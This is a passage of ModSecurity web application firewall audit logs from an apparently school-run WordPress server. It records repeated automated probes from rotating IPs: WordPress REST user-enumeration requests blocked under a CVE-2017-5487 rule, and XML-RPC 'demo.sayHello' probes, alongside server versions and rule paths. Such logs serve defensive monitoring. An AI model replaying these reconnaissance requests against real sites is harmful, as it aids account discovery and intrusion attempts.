Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e78fab2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e78fab2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450523890544 2642 (- - -) Stopwatch2: 1747450523890544 2642; combined=1400, p1=483, p2=888, p3=0, p4=0, p5=29, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e78fab2c-Z-- --2a725b08-A-- [17/May/2025:09:55:29 +0700] aCf6oQTOsBn9MSWb6WJwAwAAAJU 103.236.140.4 50424 103.236.140.4 8181 --2a725b08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a725b08-C-- demo.sayHello --2a725b08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a725b08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450529106470 5789 (- - -) Stopwatch2: 1747450529106470 5789; combined=4159, p1=520, p2=3460, p3=31, p4=33, p5=68, sr=65, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a725b08-Z-- --8d054772-A-- [17/May/2025:09:55:59 +0700] aCf6v3yxdQCiyU1ENFcrdQAAAAU 103.236.140.4 50558 103.236.140.4 8181 --8d054772-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d054772-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d054772-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450559447294 2769 (- - -) Stopwatch2: 1747450559447294 2769; combined=1227, p1=424, p2=774, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d054772-Z-- --5f07873f-A-- [17/May/2025:09:56:04 +0700] aCf6xBKi5m5upc8uMd6jZAAAANE 103.236.140.4 50560 103.236.140.4 8181 --5f07873f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f07873f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f07873f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450564071975 3244 (- - -) Stopwatch2: 1747450564071975 3244; combined=1431, p1=503, p2=897, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f07873f-Z-- --3f0e917a-A-- [17/May/2025:09:56:08 +0700] aCf6yOm4kjNN-hEbWjJDBQAAAEs 103.236.140.4 50566 103.236.140.4 8181 --3f0e917a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0e917a-C-- demo.sayHello --3f0e917a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0e917a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450568736312 4948 (- - -) Stopwatch2: 1747450568736312 4948; combined=3774, p1=454, p2=3114, p3=24, p4=28, p5=90, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0e917a-Z-- --245d8237-A-- [17/May/2025:09:56:10 +0700] aCf6yum4kjNN-hEbWjJDBgAAAEw 103.236.140.4 50568 103.236.140.4 8181 --245d8237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --245d8237-C-- demo.sayHello --245d8237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --245d8237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450570479234 5807 (- - -) Stopwatch2: 1747450570479234 5807; combined=4264, p1=515, p2=3523, p3=29, p4=32, p5=96, sr=82, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --245d8237-Z-- --64102c00-A-- [17/May/2025:09:57:08 +0700] aCf7BHyxdQCiyU1ENFcreAAAAAo 103.236.140.4 50590 103.236.140.4 8181 --64102c00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64102c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64102c00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450628869169 2924 (- - -) Stopwatch2: 1747450628869169 2924; combined=1293, p1=434, p2=829, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64102c00-Z-- --3ba2fa0a-A-- [17/May/2025:09:57:15 +0700] aCf7CwTOsBn9MSWb6WJwBQAAAJg 103.236.140.4 50594 103.236.140.4 8181 --3ba2fa0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ba2fa0a-C-- demo.sayHello --3ba2fa0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ba2fa0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450635074167 5326 (- - -) Stopwatch2: 1747450635074167 5326; combined=3949, p1=467, p2=3268, p3=24, p4=28, p5=95, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ba2fa0a-Z-- --9849e12f-A-- [17/May/2025:09:58:10 +0700] aCf7Qum4kjNN-hEbWjJDCwAAAFU 103.236.140.4 50598 103.236.140.4 8181 --9849e12f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9849e12f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9849e12f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450690775211 3299 (- - -) Stopwatch2: 1747450690775211 3299; combined=1422, p1=483, p2=906, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849e12f-Z-- --4510d02f-A-- [17/May/2025:09:58:17 +0700] aCf7SQTOsBn9MSWb6WJwBgAAAIE 103.236.140.4 50602 103.236.140.4 8181 --4510d02f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4510d02f-C-- demo.sayHello --4510d02f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4510d02f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450697726941 5778 (- - -) Stopwatch2: 1747450697726941 5778; combined=4201, p1=573, p2=3397, p3=32, p4=44, p5=92, sr=99, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4510d02f-Z-- --73f03274-A-- [17/May/2025:09:58:36 +0700] aCf7XOm4kjNN-hEbWjJDDgAAAEI 103.236.140.4 50610 103.236.140.4 8181 --73f03274-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73f03274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f03274-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450716188548 2524 (- - -) Stopwatch2: 1747450716188548 2524; combined=1210, p1=407, p2=773, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f03274-Z-- --30feea04-A-- [17/May/2025:09:58:44 +0700] aCf7ZATOsBn9MSWb6WJwCQAAAIY 103.236.140.4 50614 103.236.140.4 8181 --30feea04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30feea04-C-- demo.sayHello --30feea04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30feea04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450724414334 17959 (- - -) Stopwatch2: 1747450724414334 17959; combined=27726, p1=599, p2=3796, p3=63, p4=45, p5=11625, sr=78, sw=68, l=0, gc=11530 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30feea04-Z-- --d8435d79-A-- [17/May/2025:09:59:04 +0700] aCf7eATOsBn9MSWb6WJwCgAAAIU 103.236.140.4 50618 103.236.140.4 8181 --d8435d79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d8435d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8435d79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450744546303 3321 (- - -) Stopwatch2: 1747450744546303 3321; combined=1422, p1=478, p2=911, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8435d79-Z-- --ea629164-A-- [17/May/2025:09:59:09 +0700] aCf7fem4kjNN-hEbWjJDDwAAAEE 103.236.140.4 50622 103.236.140.4 8181 --ea629164-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ea629164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea629164-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450749259281 2868 (- - -) Stopwatch2: 1747450749259281 2868; combined=1296, p1=432, p2=834, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea629164-Z-- --8e52ce16-A-- [17/May/2025:09:59:10 +0700] aCf7fum4kjNN-hEbWjJDEAAAAEA 103.236.140.4 50624 103.236.140.4 8181 --8e52ce16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e52ce16-C-- demo.sayHello --8e52ce16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e52ce16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450750034583 4843 (- - -) Stopwatch2: 1747450750034583 4843; combined=3903, p1=408, p2=3274, p3=33, p4=37, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e52ce16-Z-- --3a6c4700-A-- [17/May/2025:09:59:15 +0700] aCf7g3yxdQCiyU1ENFcrfAAAAA8 103.236.140.4 50630 103.236.140.4 8181 --3a6c4700-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a6c4700-C-- demo.sayHello --3a6c4700-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a6c4700-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450755057523 4669 (- - -) Stopwatch2: 1747450755057523 4669; combined=3628, p1=436, p2=2946, p3=23, p4=25, p5=117, sr=66, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a6c4700-Z-- --7fe23974-A-- [17/May/2025:10:00:25 +0700] aCf7yRKi5m5upc8uMd6jewAAANU 103.236.140.4 50682 103.236.140.4 8181 --7fe23974-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7fe23974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fe23974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450825925627 2465 (- - -) Stopwatch2: 1747450825925627 2465; combined=1261, p1=398, p2=833, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fe23974-Z-- --c6b3f520-A-- [17/May/2025:10:00:33 +0700] aCf70XyxdQCiyU1ENFcrfgAAABQ 103.236.140.4 50688 103.236.140.4 8181 --c6b3f520-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 